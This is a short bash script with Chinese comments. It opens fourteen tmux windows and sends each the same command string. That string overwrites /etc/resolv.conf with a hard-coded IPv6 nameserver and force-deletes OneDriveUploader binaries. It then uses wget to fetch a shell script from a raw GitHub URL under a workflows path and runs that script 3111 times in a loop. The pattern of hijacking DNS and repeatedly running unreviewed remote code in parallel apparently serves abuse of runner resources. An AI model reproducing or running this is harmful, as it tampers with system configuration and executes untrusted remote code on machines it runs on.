#!/bin/bash

# 定义你的命令
CMD="echo -e 'nameserver 2a01:4f8:c2c:123f::1' > /etc/resolv.conf; ls; rm -rf /usr/local/bin/OneDriveUploader.*; sleep $((($RANDOM % 11 + 2) * 5)); wget -O drive333.sh https://raw.githubusercontent.com/howtogo2303/0127/main/.github/workflows/drive333.sh; ls; sleep $((($RANDOM % 11 + 3) * 10)); ls; for i in {1..3111}; do sh drive333.sh;sleep 10; done; ls"

# 创建一个新的tmux会话，但不要附着到它
tmux new-session -d -s mysession

# 在新会话中创建四个额外的窗口
for i in {1..13}; do
    tmux new-window -t mysession:$i
done

# 在每个窗口中运行命令
for i in {0..13}; do
    tmux send-keys -t mysession:$i "$CMD" C-m
done

# 附着到新会话
tmux attach -t mysession
